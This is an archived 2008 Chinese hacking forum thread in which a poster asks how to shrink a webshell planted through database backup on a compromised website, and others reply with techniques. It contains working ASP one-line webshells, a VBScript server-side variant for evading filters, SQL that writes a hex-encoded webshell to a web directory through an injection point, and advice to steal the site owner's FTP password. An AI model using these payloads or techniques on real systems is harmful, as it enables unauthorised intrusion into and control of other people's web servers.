【3.A.S.T】网络安全爱好者's Archiver

黑客学习

虚竹 发表于 2008-7-21 00:20

[讨论]数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?

[讨论]数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?
文章作者:redbin

信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])


数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?

<%eval(request("a")):response.end%>
<%eval(request("a"))%>
<%execute request("a")%>
全部尝试过
用那个结束语句也不可以,每次都drop掉一下新BAK,
测试过BAK成txt  下回来有9M多,改成ASP放自己服务器测试下确实由于过大,而且屏蔽了错误返回信息,从而导致连接不上!不知道各位有什么高见可以让BAK出的小一些呢?小了肯定就可以访问了,或者有什么方法可以能让可以连上即可!



ps:可以列目录但是找不到后台,已经手工测试了那个所谓的后台目录近百个文件!

QQ 35475

lx319 发表于 2008-7-21 00:20

其实不必备份整个数据库的.备份个别的表也行的.具体百度一下吧.鸟大了,什么林子都飞.
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=161549]0[/url] 积分25 阅读权限40 性别男 来自南方 在线时间6 小时 注册时间2008-4-6 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=161549]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=141967&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=141967&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]

[url=http://forum.eviloctal.com/space-uid-133110.html]miao2[/url]
﹎'颓废小猫;
[img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

枫枫 发表于 2008-7-21 00:20

log备份出来的马好象只有70几K
而且原先数据库中不能有 "<%" 字符,不然一样连接不上.
我就记得这些了
[url=http://wpa.qq.com/msgrd?V=1&Uin=308449635&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子26 精华[url=http://forum.eviloctal.com/digest.php?authorid=133110]2[/url] 积分89 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133110]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=141997&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=141997&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-16052.html]remax[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

dahuzi3938 发表于 2008-7-21 00:20

差异。



备份。20字节够写什么?
[url=http://wpa.qq.com/msgrd?V=1&Uin=37424654&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子325 精华[url=http://forum.eviloctal.com/digest.php?authorid=16052]2[/url] 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 [url=http://www.remaxz.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=16052]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=141998&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=141998&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-1564.html]小胖子[/url]
Calm
[img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

isuzu12626 发表于 2008-7-21 00:20

看一下可不可以跨库,备份别的库试一下。上次我上网查资料,突然弹出来一个网页,很黄很暴力,我赶紧给关了。
[url=http://wpa.qq.com/msgrd?V=1&Uin=89243110&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子191 精华[url=http://forum.eviloctal.com/digest.php?authorid=1564]2[/url] 积分494 阅读权限40 性别男 在线时间87 小时 注册时间2005-1-18 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1564]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142007&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142007&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]

[url=http://forum.eviloctal.com/space-uid-124172.html]blackpather[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

n煲 发表于 2008-7-21 00:20

貌似碰到过这样的问题,  “屏蔽了错误返回信息”这个在服务器上是他自己自定义错误。
“可以列目录但是找不到后台” 好像是把后台删了,他自己机登陆后台管理时再FTP上传。
看他用的DD 是开源的不? 运气好的话 把FTP 密码搞过来,替他上传后台文件。。。
那点不对请批评指正。。。越狱出来滴!
[url=http://wpa.qq.com/msgrd?V=1&Uin=100618707&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=124172]0[/url] 积分33 阅读权限40 性别男 来自河南 在线时间25 小时 注册时间2007-5-29 最后登录2008-7-11 [url=http://www.blackpather.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=124172]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142052&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142052&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然

旧化王 发表于 2008-7-21 00:20

NBSI快多了 。

%%被过滤的时候考虑下 <script language=vbscript runat=server>execute request("#")</script>

[img]http://forum.eviloctal.com/images/smilies/default/sweat.gif[/img]
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142058&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142058&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-92794.html]poc[/url] [img]http://forum.eviloctal.com/images/avatars/pw/smile4.JPG[/img]
晶莹剔透§烈日灼然

pat1110 发表于 2008-7-21 00:20

你们回复只有一个同学说到了点
备份一个表
其他的也不看看楼主是什么人
汗!
帖子31 精华[url=http://forum.eviloctal.com/digest.php?authorid=92794]0[/url] 积分90 阅读权限40 性别男 在线时间57 小时 注册时间2007-3-18 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=92794]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142264&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142264&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-162860.html]outstand[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

win 发表于 2008-7-21 00:20

导出一个表看看效果!
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=162860]0[/url] 积分6 阅读权限40 在线时间5 小时 注册时间2008-5-6 最后登录2008-5-27 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=162860]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142269&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142269&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-62631.html]kof2008[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

XYFHID 发表于 2008-7-21 00:20

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(0x3C25657865637574652872657175657374282261222929253EDA);
select cmd from a into outfile 'X:\WEB\1.asp';
Drop TABLE IF EXISTS a;
0x3C25657865637574652872657175657374282261222929253EDA是LAKE的一句话,密码为a
在PHP环境里我成功过,不知道ASP怎么样
MS在注入点后执行的话要加个;
如果是字符型的话还要加多个点'[img]http://forum.eviloctal.com/images/smilies/default/smile.gif[/img]
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=62631]0[/url] 积分7 阅读权限40 性别男 在线时间2 小时 注册时间2006-8-28 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62631]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32948&repquote=142286&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32948&pid=142286&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-161260.html]jacksatan[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.